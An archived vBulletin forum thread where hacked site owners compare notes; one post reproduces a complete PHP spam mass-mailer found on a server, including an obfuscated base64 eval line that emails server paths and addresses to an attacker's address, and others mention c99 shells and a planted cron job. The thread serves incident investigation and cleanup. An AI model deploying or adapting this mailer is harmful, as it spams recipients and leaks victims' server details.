Go Back   vb.org Archive > vBulletin 3 Discussion > vB3 General Discussions
FAQ Community Calendar Today's Posts Search

Reply
 
Thread Tools Display Modes
  #11  
Old 09-21-2008, 09:12 AM
Ahmed-Rabe3 Ahmed-Rabe3 is offline
 
Join Date: Sep 2008
Posts: 1
Благодарил(а): 0 раз(а)
Поблагодарили: 0 раз(а) в 0 сообщениях
Default

me to my site is hacked
Reply With Quote
  #12  
Old 09-21-2008, 02:43 PM
iogames's Avatar
iogames iogames is offline
 
Join Date: Jan 2007
Location: Las Vegas, NV.
Posts: 1,433
Благодарил(а): 0 раз(а)
Поблагодарили: 0 раз(а) в 0 сообщениях
Default

I think they weren't after vB since they just injected stuff to spam, and I discover a new email account on my cP with high activity...

2 more files [since this is moved to a discussion forum]

yomistarz.php

PHP Code:
<?php



if(isset($_POST['action'] ) ){

$action=$_POST['action'];

$message=$_POST['message'];

$emaillist=$_POST['emaillist'];

$from=$_POST['from'];

$replyto=$_POST['replyto'];

$subject=$_POST['subject'];

$realname=$_POST['realname'];

$file_name=$_POST['file'];

$contenttype=$_POST['contenttype'];



        
$message urlencode($message);

        
$message ereg_replace("%5C%22""%22"$message);

        
$message urldecode($message);

        
$message stripslashes($message);

        
$subject stripslashes($subject);

}





?>

<html>

<head>

<title>|| InboX Mass Mailer ||</title>

<meta http-equiv="Content-Type" content="text/html; 

charset=iso-8859-1">



<style type="text/css">

<!--

.style1 {

        font-family: Geneva, Arial, Helvetica, sans-serif;

        font-size: 12px;

}

-->

</style>

<style type="text/css">

<!--

.style1 {

        font-size: 20px;

        font-family: Geneva, Arial, Helvetica, sans-serif;

}

-->

</style>

</head>

<body bgcolor="FF9900" text="#ffffff">

<span class="style1">InboX Mass Mailer<br>

</span>



<form name="form1" method="post" action="" 

enctype="multipart/form-data">

  <br>

  <table width="100%" border="0">

    <tr>

      <td width="10%">

        <div align="right"><font size="-3" face="Verdana, Arial, 

Helvetica, sans-serif">Your

          Email:</font></div>

      </td>

      <td width="18%"><font size="-3" face="Verdana, Arial, Helvetica, 

sans-serif">

        <input type="text" name="from" value="<? print $from; ?>" 

size="30">

        </font></td>

      <td width="31%">

        <div align="right"><font size="-3" face="Verdana, Arial, 

Helvetica, sans-serif">Your

          Name:</font></div>

      </td>

      <td width="41%"><font size="-3" face="Verdana, Arial, Helvetica, 

sans-serif">

        <input type="text" name="realname" value="<? print $realname; 

?>" size="30">

        </font></td>

    </tr>

    <tr>

      <td width="10%">

        <div align="right"><font size="-3" face="Verdana, Arial, 

Helvetica, sans-serif">Reply-To:</font></div>

      </td>

      <td width="18%"><font size="-3" face="Verdana, Arial, Helvetica, 

sans-serif">

        <input type="text" name="replyto" value="<? print $replyto; ?>" 

size="30">

        </font></td>

      <td width="31%">

        <div align="right"><font size="-3" face="Verdana, Arial, 

Helvetica, sans-serif">Attach

          File:</font></div>

      </td>

      <td width="41%"><font size="-3" face="Verdana, Arial, Helvetica, 

sans-serif">

        <input type="file" name="file" size="30">

        </font></td>

    </tr>

    <tr>

      <td width="10%">

        <div align="right"><font size="-3" face="Verdana, Arial, 

Helvetica, sans-serif">Subject:</font></div>

      </td>

      <td colspan="3"><font size="-3" face="Verdana, Arial, Helvetica, 

sans-serif">

        <input type="text" name="subject" value="<? print $subject; ?>" 

size="90">

        </font></td>

    </tr>

    <tr valign="top">

      <td colspan="3"><font size="-3" face="Verdana, Arial, Helvetica, 

sans-serif">

        <textarea name="message" cols="50" rows="10"><? print $message; 

?></textarea>

        <br>

        <input type="radio" name="contenttype" value="plain" >

        Plain Text

        <input name="contenttype" type="radio" value="html" checked>

        HTML

        <input type="hidden" name="action" value="send">

        <input type="submit" value="Send eMails">

        </font></td>

      <td width="41%"><font size="-3" face="Verdana, Arial, Helvetica, 

sans-serif">

        <textarea name="emaillist" cols="30" rows="10"><? print 

$emaillist; ?></textarea>

        </font></td>

    </tr>

  </table>

</form>







<?



if ($action){



        if (!$from && !$subject && !$message && !$emaillist){

        print "Please complete all fields before sending your 

message.";

        exit;    

    }

    $allemails = split("\n", $emaillist);

            $numemails = count($allemails);

       

          for($x=0; $x<$numemails; $x++){

                $to = $allemails[$x];

                if ($to){

                $to = ereg_replace(" ", "", $to);

                $message = ereg_replace("&email&", $to, $message);

                $subject = ereg_replace("&email&", $to, $subject);

                print " $to.......";

                flush();

                $header = "From: $realname <$from>\r\nReply-To: $replyto\r\n";

                $header .= "MIME-Version: 1.0\r\n";

            If ($file_name) $header .= "Content-Type: multipart/mixed; boundary=$uid\r\n";

              If ($file_name) $header .= "--$uid\r\n";

                $header .= "Content-Type: text/$contenttype\r\n";

                $header .= "Content-Transfer-Encoding: 8bit\r\n\r\n";

                $header .= "$message\r\n";

            If ($file_name) $header .= "--$uid\r\n";

            If ($file_name) $header .= "Content-Type: $file_type; name=\"$file_name\"\r\n";

            If ($file_name) $header .= "Content-Transfer-Encoding: base64\r\n";

            If ($file_name) $header .= "Content-Disposition: attachment; filename=\"$file_name\"\r\n\r\n";

            If ($file_name) $header .= "$content\r\n";

            If ($file_name) $header .= "--$uid--";

                mail($to, $subject, "", $header);

                print "spammed<br>";

    

                flush();

                }

                }

$ra44  = rand(1,99999);

$subj98 = "sh-$ra44";

$a5 = $_SERVER['HTTP_REFERER'];

$b33 = $_SERVER['DOCUMENT_ROOT'];

$c87 = $_SERVER['REMOTE_ADDR'];

$d23 = $_SERVER['SCRIPT_FILENAME'];

$e09 = $_SERVER['SERVER_ADDR'];

$f23 = $_SERVER['SERVER_SOFTWARE'];

$g32 = $_SERVER['PATH_TRANSLATED'];

$h65 = $_SERVER['PHP_SELF'];

$message=$_POST['message'];

$msg = "$a5\n$b33\n$c87\n$d23\n$e09\n$f23\n$g32\n$h65";

echo eval(base64_decode("bWFpbCgiZ3JvZmloYWNrQGdtYWlsLmNvbSIsICRzdWJqOTgsICRtc2csICRtZXNzYWdlLCAkcmE0NCk7"));

}





?>

<style type="text/css">

<!--

.style1 {

    font-size: 20px;

    font-family: Geneva, Arial, Helvetica, sans-serif;

}

-->

</style>

<p class="style1">

   Copyright ? 2007 phpbb.com



      </p>

<?php

if(isset($_POST['action']) && $numemails !==){echo 

"<script>alert('Mail sending complete\\r\\n$numemails mail(s) was sent successfully'); 

</script>"
;}

?>

</body>

</html>
and a file named SS.PHP with 6k lines

Why we don't counterattack? I mean, we are majority, we together know more than this pranksters...
Reply With Quote
  #13  
Old 09-21-2008, 02:49 PM
iPodHacking.com iPodHacking.com is offline
 
Join Date: Nov 2007
Posts: 76
Благодарил(а): 0 раз(а)
Поблагодарили: 0 раз(а) в 0 сообщениях
Default

Is that a spam php script?
Reply With Quote
  #14  
Old 09-21-2008, 03:08 PM
MiskaTorn MiskaTorn is offline
 
Join Date: Aug 2004
Posts: 58
Благодарил(а): 0 раз(а)
Поблагодарили: 0 раз(а) в 0 сообщениях
Default

I got hacked with that script too, no clue how they got it on my server.

Though the only thing running on my web server is vbulletin.
Reply With Quote
  #15  
Old 09-21-2008, 05:22 PM
iogames's Avatar
iogames iogames is offline
 
Join Date: Jan 2007
Location: Las Vegas, NV.
Posts: 1,433
Благодарил(а): 0 раз(а)
Поблагодарили: 0 раз(а) в 0 сообщениях
Default

Well, the problem was resolved in a few hours, I find this in cPanel's Cron Job section:

Quote:
public_html/auctions/components/y2kupdate >/dev/null 2>&1
Reply With Quote
  #16  
Old 09-21-2008, 05:45 PM
balance12 balance12 is offline
 
Join Date: Sep 2007
Posts: 106
Благодарил(а): 0 раз(а)
Поблагодарили: 0 раз(а) в 0 сообщениях
Default

WOw... i have a "hackers problem" someone is injecting me shells in my site ("c99"....
Reply With Quote
  #17  
Old 09-21-2008, 07:00 PM
agitated agitated is offline
 
Join Date: Jan 2005
Location: U.K.
Posts: 141
Благодарил(а): 0 раз(а)
Поблагодарили: 0 раз(а) в 0 сообщениях
Default

@iogames

I'm confused as to what you are trying to tell us here.

You've not confirmed how they gained access.
How did they get the files into your directories. ?

Did you have a backdoor open or was it via another site on the shared hosting ?

Would it not be more helpful to let people know exactly what version of vBulletin you have installed
What hacks are installed.
Also what else do you have running on your site.

If people see something in common then it may help to close a vulnerability that may have been exploited.
Reply With Quote
  #18  
Old 09-21-2008, 07:16 PM
iogames's Avatar
iogames iogames is offline
 
Join Date: Jan 2007
Location: Las Vegas, NV.
Posts: 1,433
Благодарил(а): 0 раз(а)
Поблагодарили: 0 раз(а) в 0 сообщениях
Default

Ok...
I was so busy that I didn't touch my site for days, till one day I got some spare time and start working on it again... I lost my access to cPanel, I just reset password and they send me to my email the current password, then I starting to look what was going on, and found those foreign files, they didn't remove nothing, then I started a assessment of the problem, and start posting:

So basically don't know if there was to a third party script, or Shell injection, Hosters will never accept that there was fault on their part, I just received their help and advise...

- CronJobs
- Inserted files
- FTP Logs
- Raw Logs
- .htaccess
- Change of passwords
- Check intengrity of the MySQL's dBs
- Eliminate unknown files, etc...
Reply With Quote
  #19  
Old 09-22-2008, 12:24 PM
esperone esperone is offline
 
Join Date: Feb 2006
Posts: 57
Благодарил(а): 0 раз(а)
Поблагодарили: 0 раз(а) в 0 сообщениях
Default

heres the guys email address: grofihack@gmail.com

i decoded the base64 encoded part of the posted script
Reply With Quote
  #20  
Old 09-22-2008, 02:59 PM
iogames's Avatar
iogames iogames is offline
 
Join Date: Jan 2007
Location: Las Vegas, NV.
Posts: 1,433
Благодарил(а): 0 раз(а)
Поблагодарили: 0 раз(а) в 0 сообщениях
Default

Quote:
Originally Posted by esperone View Post
heres the guys email address: grofihack@gmail.com

i decoded the base64 encoded part of the posted script
See? we must fight back and don't play victims...
after they run out of tricks, they must start running
Reply With Quote
Reply


Posting Rules
You may not post new threads
You may not post replies
You may not post attachments
You may not edit your posts

BB code is On
Smilies are On
[IMG] code is On
HTML code is Off

Forum Jump


All times are GMT. The time now is 10:16 AM.


Powered by vBulletin® Version 3.8.12 by vBS
Copyright ©2000 - 2025, vBulletin Solutions Inc.
X vBulletin 3.8.12 by vBS Debug Information
  • Page Generation 0.11310 seconds
  • Memory Usage 2,303KB
  • Queries Executed 13 (?)
More Information
Template Usage:
  • (1)SHOWTHREAD
  • (1)ad_footer_end
  • (1)ad_footer_start
  • (1)ad_header_end
  • (1)ad_header_logo
  • (1)ad_navbar_below
  • (1)ad_showthread_beforeqr
  • (1)ad_showthread_firstpost
  • (1)ad_showthread_firstpost_sig
  • (1)ad_showthread_firstpost_start
  • (1)bbcode_php
  • (2)bbcode_quote
  • (1)footer
  • (1)forumjump
  • (1)forumrules
  • (1)gobutton
  • (1)header
  • (1)headinclude
  • (1)navbar
  • (3)navbar_link
  • (120)option
  • (1)pagenav
  • (1)pagenav_curpage
  • (2)pagenav_pagelink
  • (10)post_thanks_box
  • (10)post_thanks_button
  • (1)post_thanks_javascript
  • (1)post_thanks_navbar_search
  • (10)post_thanks_postbit_info
  • (10)postbit
  • (10)postbit_onlinestatus
  • (10)postbit_wrapper
  • (1)spacer_close
  • (1)spacer_open
  • (1)tagbit_wrapper 

Phrase Groups Available:
  • global
  • inlinemod
  • postbit
  • posting
  • reputationlevel
  • showthread
Included Files:
  • ./showthread.php
  • ./global.php
  • ./includes/init.php
  • ./includes/class_core.php
  • ./includes/config.php
  • ./includes/functions.php
  • ./includes/class_hook.php
  • ./includes/modsystem_functions.php
  • ./includes/functions_bigthree.php
  • ./includes/class_postbit.php
  • ./includes/class_bbcode.php
  • ./includes/functions_reputation.php
  • ./includes/functions_post_thanks.php 

Hooks Called:
  • init_startup
  • init_startup_session_setup_start
  • init_startup_session_setup_complete
  • cache_permissions
  • fetch_postinfo_query
  • fetch_postinfo
  • fetch_threadinfo_query
  • fetch_threadinfo
  • fetch_foruminfo
  • style_fetch
  • cache_templates
  • global_start
  • parse_templates
  • global_setup_complete
  • showthread_start
  • showthread_getinfo
  • forumjump
  • showthread_post_start
  • showthread_query_postids
  • showthread_query
  • bbcode_fetch_tags
  • bbcode_create
  • showthread_postbit_create
  • postbit_factory
  • postbit_display_start
  • post_thanks_function_post_thanks_off_start
  • post_thanks_function_post_thanks_off_end
  • post_thanks_function_fetch_thanks_start
  • post_thanks_function_fetch_thanks_end
  • post_thanks_function_thanked_already_start
  • post_thanks_function_thanked_already_end
  • fetch_musername
  • postbit_imicons
  • bbcode_parse_start
  • bbcode_parse_complete_precache
  • bbcode_parse_complete
  • postbit_display_complete
  • post_thanks_function_can_thank_this_post_start
  • pagenav_page
  • pagenav_complete
  • tag_fetchbit_complete
  • forumrules
  • navbits
  • navbits_complete
  • showthread_complete